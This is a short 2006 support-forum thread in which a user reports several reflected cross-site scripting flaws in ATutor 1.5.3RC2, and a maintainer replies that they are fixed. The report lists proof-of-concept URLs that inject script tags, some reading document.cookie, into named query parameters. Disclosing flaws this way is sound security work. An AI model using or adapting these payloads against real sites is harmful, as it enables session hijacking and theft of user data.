Support Forums
ATutor Bug Reports
Security Bugs
You must be signed-in to post.
| Author | Subject | |
|---|---|---|
| Page: 1 | ||
| security | Subject: Security Bugs |  |
| Hello, There are several XSS security bugs in ATutor : /ATutor-1.5.3RC2/admin/create_course.php?show_courses="><script>alert(1)</script><a%20"¤t_cat="><script>alert(2)</script><a%20" /ATutor-1.5.3RC2/users/create_course.php?show_courses="><script>alert(1)</script><a%20" /ATutor-1.5.3RC2/documentation/admin/?p=2.0.configuration.php"></frameset></frameset><script>alert(document.cookie)</script><!-- /ATutor-1.5.3RC2/password_reminder.php?forgot=Email+Reminder"><script>alert(document.cookie)</script><a%20" /ATutor-1.5.3RC2/users/browse.php?cat=0"><script>alert(document.cookie)</script><a%20" /ATutor-1.5.3RC2/admin/fix_content.php?submit=Submit"><script>alert(document.cookie)</script><a%20" Note that some of these bugs maybe doesnt work with Firefox . With regards, securitynews.ir/ Posted: 2006-07-05 04:40:54 | ||
 | ||
greg | Subject: Re: Security Bugs | |
| These have been fixed, and are available in the final release. thx Posted: 2006-07-05 08:19:48 | ||
| ||
| Page: 1 | ||
You must be signed-in to post.
